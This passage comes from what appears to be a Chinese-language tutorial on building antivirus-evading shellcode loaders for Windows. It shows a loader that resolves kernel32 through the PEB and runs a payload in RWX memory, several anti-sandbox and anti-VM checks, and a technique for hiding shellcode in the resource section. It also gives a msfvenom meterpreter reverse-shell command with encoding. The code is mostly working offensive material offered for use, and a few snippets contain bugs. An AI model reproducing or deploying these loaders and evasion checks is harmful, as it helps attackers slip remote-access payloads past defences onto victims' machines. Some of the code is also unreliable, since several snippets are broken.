class="string">&quot;explorer.exe&quot;</span>) == <span class="number">0</span>)&#123;</span><br><span class="line">                explorerProcessId = pe32.th32ProcessID;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                bMore = Process32Next(handle,&amp;pe32);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> explorerProcessId;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="keyword">typedef</span> VOID *(WINAPI* pVirtualAlloc)(LPVOID lpAddress, SIZE_T  dwSize, DWORD  flAllocationType, DWORD flProtect);</span><br><span class="line">    pVirtualAlloc VirtualAlloc;</span><br><span class="line">    <span class="comment">//HMODULE hModule;</span></span><br><span class="line">    _asm &#123;</span><br><span class="line">        mov esi, fs:[<span class="number">0x30</span>]  <span class="comment">//获得PEB结构体首地址</span></span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov esi, [esi + <span class="number">0xc</span>]  <span class="comment">//获得PEB_LDR_DATA结构体首地址</span></span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov esi, [esi + <span class="number">0x1c</span>]  <span class="comment">//获得LIST_ENTRY结构体首地址</span></span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov esi, [esi]  <span class="comment">//沿着链表往下找</span></span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov esi, [esi]</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov esi, [esi + <span class="number">0x8</span>]  <span class="comment">//Kernel32.dll模块的地址</span></span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        NOP</span><br><span class="line">        mov hKernel32HMODULE, esi</span><br><span class="line">    &#125;</span><br><span class="line">    DWORD explorerProcessId = GetexplorerProcessId();</span><br><span class="line">    DWORD ParentProcessId = GetParentProcessId(GetCurrentProcessId());</span><br><span class="line">    <span class="keyword">if</span>(explorerProcessId != ParentProcessId)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;HelloWorld&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    VirtualAlloc = (pVirtualAlloc)GetProcAddress(hKernel32HMODULE,<span class="string">&quot;VirtualAlloc&quot;</span>);</span><br><span class="line">    <span class="type">char</span>* memoryptr = (<span class="type">char</span>*)VirtualAlloc(<span class="literal">NULL</span>,<span class="keyword">sizeof</span>(buf),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);</span><br><span class="line">    <span class="built_in">memcpy</span>(memoryptr,&amp;buf,<span class="keyword">sizeof</span>(buf));</span><br><span class="line">    ((<span class="type">void</span>(*)(<span class="type">void</span>))memoryptr)();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="0x031-检测硬件资源"><a href="#0x031-检测硬件资源" class="headerlink" title="0x031 检测硬件资源"></a>0x031 检测硬件资源</h3><p>检测运行可执行文件时的环境，要求环境需达到一定的配置，像我平时使用虚拟机磁盘内存都不会给到100G这么大，下面的代码就要求总核数至少为2&#x2F;内存至少2G&#x2F;磁盘大小至少&#x2F;100G</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">通过检测硬件资源来反沙箱()</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">BOOL <span class="title function_">CheckHardwareResources</span><span class="params">()</span>&#123;</span><br><span class="line">    SYSTEM_INFO systemInfo;</span><br><span class="line">    GetSystemInfo(&amp;systemInfo);</span><br><span class="line">    <span class="comment">//需要环境至少有两个内核</span></span><br><span class="line">    <span class="keyword">if</span>(systemInfo.dwNumberOfProcessors &lt; <span class="number">2</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;dwNumberOfProcessors\n&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    MEMORYSTATUSEX MemStat;</span><br><span class="line">    MemStat.dwLength = <span class="keyword">sizeof</span>(MEMORYSTATUSEX);</span><br><span class="line">    GlobalMemoryStatusEx(&amp;MemStat);</span><br><span class="line">    DWORD totalMemory = MemStat.ullTotalPageFile / <span class="number">1024</span> /<span class="number">1024</span>;</span><br><span class="line">    <span class="comment">//需要环境至少有2G内存</span></span><br><span class="line">    <span class="keyword">if</span>(totalMemory &lt; <span class="number">2048</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;totalMemory\n&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    HANDLE hDevice = CreateFileW(TEXT(<span class="string">&quot;\\\\.\\PhysicalDrive0&quot;</span>),<span class="number">0</span>,FILE_SHARE_READ | FILE_SHARE_WRITE,<span class="literal">NULL</span>,OPEN_EXISTING,<span class="number">0</span>,<span class="literal">NULL</span>);</span><br><span class="line">    DISK_GEOMETRY pDiskGeometry;</span><br><span class="line">    DWORD bytesReturned;</span><br><span class="line">    DeviceIoControl(hDevice, IOCTL_DISK_GET_DRIVE_GEOMETRY, <span class="literal">NULL</span>, <span class="number">0</span>, &amp;pDiskGeometry, <span class="keyword">sizeof</span>(pDiskGeometry), &amp;bytesReturned, (LPOVERLAPPED)<span class="literal">NULL</span>);</span><br><span class="line">    DWORD diskSizeGB;</span><br><span class="line">    diskSizeGB = pDiskGeometry.Cylinders.QuadPart * (ULONG)pDiskGeometry.TracksPerCylinder * (ULONG)pDiskGeometry.SectorsPerTrack * (ULONG)pDiskGeometry.BytesPerSector / <span class="number">1024</span> / <span class="number">1024</span> / <span class="number">1024</span>;</span><br><span class="line">    <span class="comment">//需要环境磁盘容量至少100G</span></span><br><span class="line">    <span class="keyword">if</span>(diskSizeGB &lt; <span class="number">100</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;diskSizeGB\n&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="0x032-检测虚拟机特征值"><a href="#0x032-检测虚拟机特征值" class="headerlink" title="0x032 检测虚拟机特征值"></a>0x032 检测虚拟机特征值</h3><h4 id="0x0320-检测是否存在-Device-VBoxGuest设备文件"><a href="#0x0320-检测是否存在-Device-VBoxGuest设备文件" class="headerlink" title="0x0320 检测是否存在\\Device\\VBoxGuest设备文件"></a>0x0320 检测是否存在<code>\\Device\\VBoxGuest</code>设备文件</h4><p>当运行可执行文件的环境存在<code>\\Device\\VBoxGuest</code>设备文件时，则认为此环境是虚拟机环境</p>
<p>下面的代码就是尝试打开<code>\\Device\\VBoxGuest</code>设备文件，检查是否打开成功</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测是否存在\\Device\\VBoxGuest设备文件(有文件包含有问题,bug后面再调)</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;winternl.h&gt;</span></span></span><br><span class="line">BOOL <span class="title function_">CheckVBoxGuest</span><span class="params">()</span>&#123;</span><br><span class="line">    OBJECT_ATTRIBUTES objectAttributes;</span><br><span class="line">    UNICODE_STRING uDeviceName;</span><br><span class="line">    RtlSecureZeroMemory(&amp;uDeviceName,<span class="keyword">sizeof</span>(uDeviceName));</span><br><span class="line">    RtlInitUnicodeString(&amp;uDeviceName,TEXT(<span class="string">&quot;\\Device\\VBoxGuest&quot;</span>));</span><br><span class="line">    InitializeObjectAttributes(&amp;objectAttributes,&amp;uDeviceName,OBJ_CASE_INSENSITIVE,<span class="number">0</span>,<span class="literal">NULL</span>);</span><br><span class="line">    HANDLE hDevice = <span class="literal">NULL</span>;</span><br><span class="line">    IO_STATUS_BLOCK ioStatusBlock;</span><br><span class="line">    NtCreateFile(&amp;hDevice,GENERIC_READ,&amp;GENERIC_READ,&amp;ioStatusBlock,<span class="literal">NULL</span>,<span class="number">0</span>,<span class="number">0</span>,FILE_OPEN,<span class="number">0</span>,<span class="literal">NULL</span>,<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span>(NT_SUCCESS(status))&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="0x0321-检测是否存在设备名包含-VBOX-关键字或者-VMWARE-关键字"><a href="#0x0321-检测是否存在设备名包含-VBOX-关键字或者-VMWARE-关键字" class="headerlink" title="0x0321 检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字"></a>0x0321 检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字</h4><p>可以检测运行环境是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字的设备来判断是否为虚拟机环境，如果存在则认为是虚拟机环境，不存在则不是虚拟机环境</p>
<p>下面的代码检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字的设备</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;setupapi.h&gt;</span> 需要在项目的附加依赖项加上setupapi.lib</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;devguid.h&gt;</span></span></span><br><span class="line">BOOL <span class="title function_">CheckVBOX</span><span class="params">()</span>&#123;</span><br><span class="line">    HDEVINFO hDeviceInfo = SetupDiGetClassDevs(&amp;GUID_DEVCLASS_DISKDRIVE,<span class="number">0</span>,<span class="number">0</span>,DIGCF_PRESENT);</span><br><span class="line">    SP_DEVINFO_DATA deviceInfoData;</span><br><span class="line">    deviceInfoData.cbSize = <span class="keyword">sizeof</span>(SP_DEVINFO_DATA);</span><br><span class="line">    SetupDiEnumDeviceInfo(hDeviceInfo,<span class="number">0</span>,&amp;deviceInfoData);</span><br><span class="line">    DWORD propertyBufferSize;</span><br><span class="line">    SetupDiGetDeviceRegistryPropertyW(hDeviceInfo,&amp;deviceInfoData,SPDRP_FRIENDLYNAME,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="number">0</span>,&amp;propertyBufferSize);</span><br><span class="line">    PWSTR HDDName = (PWSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,HEAP_ZERO_MEMORY);</span><br><span class="line">    SetupDiGetDeviceRegistryPropertyW(hDeviceInfo,&amp;deviceInfoData,SPDRP_FRIENDLYNAME,<span class="literal">NULL</span>,(PBYTE)HDDName,propertyBufferSize,<span class="literal">NULL</span>);</span><br><span class="line">    CharUpperW(HDDName);</span><br><span class="line">    <span class="keyword">if</span>(wcsstr(HDDName,TEXT(<span class="string">&quot;VBOX&quot;</span>) || wcsstr(HDDName,TEXT(<span class="string">&quot;VMWARE&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="0x0322-检测虚拟机中特有的进程"><a href="#0x0322-检测虚拟机中特有的进程" class="headerlink" title="0x0322 检测虚拟机中特有的进程"></a>0x0322 检测虚拟机中特有的进程</h4><p>使用Vmware和VirtualBox创建的虚拟机会有一些特定的进程，这些进程是在物理机中没有的，这样就可以检测运行时的环境是否存在这些进程，存在这些进程则为虚拟机环境，否则为物理机环境</p>
<p>Vmware可以检测Vmtoolsd.exe&#x2F;Vmwaretrat.exe&#x2F;Vmwareuser.exe&#x2F;Vmacthlp.exe进程；Vmacthlp.exe可以检测vboxservice.exe&#x2F;vboxtray.exe进程</p>
<p>检测Vmware创建的虚拟机的特定进程代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测是否存在Vmware创建的虚拟机特有的进程</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">BOOL <span class="title function_">CheckVmwareProcess</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* <span class="built_in">list</span>[<span class="number">4</span>] = &#123; <span class="string">&quot;vmtoolsd.exe&quot;</span>,<span class="string">&quot;vmwaretrat.exe&quot;</span>,<span class="string">&quot;vmwareuser.exe&quot;</span>,<span class="string">&quot;vmacthlp.exe&quot;</span>&#125;;</span><br><span class="line">    PROCESSENTRY32 pe32;</span><br><span class="line">    pe32.dwSize = <span class="keyword">sizeof</span>(PROCESSENTRY32);</span><br><span class="line">    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,<span class="number">0</span>);</span><br><span class="line">    BOOL bResult = Process32First(hProcessSnap,&amp;pe32);</span><br><span class="line">    <span class="keyword">while</span>(bResult)&#123;</span><br><span class="line">        <span class="type">char</span> ss_Name[MAX_PATH] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">        WideCharToMultiByte(CP_ACP,<span class="number">0</span>,pe32.szExeFile,<span class="number">-1</span>,ss_Name,<span class="keyword">sizeof</span>(ss_Name),<span class="literal">NULL</span>,<span class="literal">NULL</span>);</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt;<span class="number">4</span>; i++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">strcmp</span>(ss_Name,<span class="built_in">list</span>[i]) == <span class="number">0</span>)&#123;</span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">&quot;%s process exist...\n&quot;</span>,<span class="built_in">list</span>[i]);</span><br><span class="line">                getchar();</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        bResult = Process32Next(hProcessSnap,&amp;pe32);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="0x0323-检测是否存在虚拟机特有的注册表键值"><a href="#0x0323-检测是否存在虚拟机特有的注册表键值" class="headerlink" title="0x0323 检测是否存在虚拟机特有的注册表键值"></a>0x0323 检测是否存在虚拟机特有的注册表键值</h4><p>使用Vmware和VirtualBox创建的虚拟机在注册表里面会有一些特定的键值，而这些键值在物理机的注册表中是没有的，那么就可以检测是否存在虚拟机特有的注册表键值，如果存在则判断为虚拟机环境，否则就不是虚拟机环境</p>
<p>Vmware创建的虚拟机特有的键值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKLM\SOFTWARE\Vmware Inc\Vmware Tools</span><br><span class="line">HKEY_CLASSES_ROOT\Applications\VMwareHostOpen.exe</span><br></pre></td></tr></table></figure>

<p>VirtualBox创建的虚拟机特有的键值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions</span><br><span class="line">HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier</span><br></pre></td></tr></table></figure>

<p>检测Vmware创建的虚拟机的特定键值代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测是否存在HKEY_CLASSES_ROOT\Applications\VMwareHostOpen.exe键值</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">BOOL <span class="title function_">CheckVmwareRegistryKey</span><span class="params">()</span>&#123;</span><br><span class="line">    HKEY hkey;</span><br><span class="line">    CString KeyStr;</span><br><span class="line">    KeyStr = TEXT(<span class="string">&quot;\\Applications\\VMwareHostOpen.exe&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(RegOpenKey(HKEY_CLASSES_ROOT,KeyStr,&amp;hkey) == ERROR_SUCCESS)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\\Applications\\VMwareHostOpen.exe RegistryKey exist...&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="0x0324-检测是否存在虚拟机特有的文件"><a href="#0x0324-检测是否存在虚拟机特有的文件" class="headerlink" title="0x0324 检测是否存在虚拟机特有的文件"></a>0x0324 检测是否存在虚拟机特有的文件</h4><p>使用Vmware和VirtualBox创建的虚拟机会有一些特有的文件，而这些文件是在物理机中没有的，那么我们就可以检测是否存在这些文件，如果存在这些文件则判断为虚拟机，否则为物理机</p>
<p>Vmware创建的虚拟机特有的文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">C:\windows\System32\Drivers\Vmmouse.sys</span><br><span class="line">C:\windows\System32\Drivers\vmtray.dll</span><br><span class="line">C:\windows\System32\Drivers\VMToolsHook.dll</span><br><span class="line">C:\windows\System32\Drivers\vmmousever.dll</span><br><span class="line">C:\windows\System32\Drivers\vmhgfs.dll</span><br><span class="line">C:\windows\System32\Drivers\vmGuestLib.dll</span><br></pre></td></tr></table></figure>

<p>VirtualBox创建的虚拟机特有的文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">C:\windows\System32\Drivers\VBoxMouse.sys</span><br><span class="line">C:\windows\System32\Drivers\VBoxGuest.sys</span><br><span class="line">C:\windows\System32\Drivers\VBoxSF.sys</span><br><span class="line">C:\windows\System32\Drivers\VBoxVideo.sys</span><br><span class="line">C:\windows\System32\vboxdisp.dll</span><br><span class="line">C:\windows\System32\vboxhook.dll</span><br><span class="line">C:\windows\System32\vboxoglerrorspu.dll</span><br><span class="line">C:\windows\System32\vboxoglpassthroughspu.dll</span><br><span class="line">C:\windows\System32\vboxservice.exe</span><br><span class="line">C:\windows\System32\vboxtray.exe</span><br><span class="line">C:\windows\System32\VBoxControl.exe</span><br></pre></td></tr></table></figure>

<p>检测Vmware创建的虚拟机特有的文件代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测是否存在Vmware创建的虚拟机特有的文件</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">BOOL <span class="title function_">CheckVmwareFile</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(access(<span class="string">&quot;C:\\windows\\System32\\Drivers\\Vmmouse.sys&quot;</span>,<span class="number">0</span>) == <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Vmware File exist...&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="0x033-检测系统环境启动时间"><a href="#0x033-检测系统环境启动时间" class="headerlink" title="0x033 检测系统环境启动时间"></a>0x033 检测系统环境启动时间</h3><p>当我们的可执行文件被放到沙盒中执行的时候，大概率沙盒环境是刚刚启动的，那么就可以判断当前系统环境的启动时间，如果启动时间过短则判断为沙盒环境，否则为物理机环境（但是我觉得这个反虚拟机不太合适，我一般虚拟机都是挂起状态的，那么启动时间肯定不会过短</p>
<p>检测代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">检测系统启动时间</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">BOOL <span class="title function_">CheckSystemStartTime</span><span class="params">()</span>&#123;</span><br><span class="line">    ULONGLONG uptime = GetTickCount64();</span><br><span class="line">    <span class="keyword">if</span>(uptime &lt; <span class="number">1200</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;SystemStartTime &lt; 1200&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>个人认为这个方法有点鸡肋</p>
<h3 id="0x034-根据微步沙箱特征来反沙箱"><a href="#0x034-根据微步沙箱特征来反沙箱" class="headerlink" title="0x034 根据微步沙箱特征来反沙箱"></a>0x034 根据微步沙箱特征来反沙箱</h3><p>微步沙箱的壁纸路径为<code>C:\Users\vbccsb\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg</code>；且壁纸文件HASH为<code>1645643018</code>，而微步沙箱的壁纸都是不变的，那么就可以在程序逻辑里检测当前环境的壁纸是否为微步沙箱特有的壁纸来判断是否为沙箱环境。</p>
<h2 id="0x04-把shellcode放到资源文件里面"><a href="#0x04-把shellcode放到资源文件里面" class="headerlink" title="0x04 把shellcode放到资源文件里面"></a>0x04 把shellcode放到资源文件里面</h2><p>咋们把shellcode放到全局变量中时，shellcode是在PE结构里的 .data 节里面的，而我们把shellcode放到资源文件中时，shellcode是在PE结构里的 .rsrc 节里面的，可能杀软静态查杀的时候检测了 .data 节里面的内容而没有检测 .rsrc 节里面的内容，那么把shellcode放到资源文件中就可以绕过杀软的静态查杀</p>
<p>直接导入shellcode.txt文件到资源里面就可以了，资源类型自己随便定义，后面找到该资源需要这个资源类型</p>
<p><img src="https://image.3001.net/images/20220717/1658029751_62d386b7c32a5c8c696fa.png!small"></p>
<p>获取项目中的资源并加载进内存中(就是把资源中的shellcode加载进内存中)，然后执行</p>
<p>我这里的shellcode.txt是用的<code>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b &#39;\x00&#39; lhost=x lport=x  -f c -o shell.c </code> shellcode（去除\x）</p>
<p>实现代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;resource.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> asciitable[] = &#123;</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span 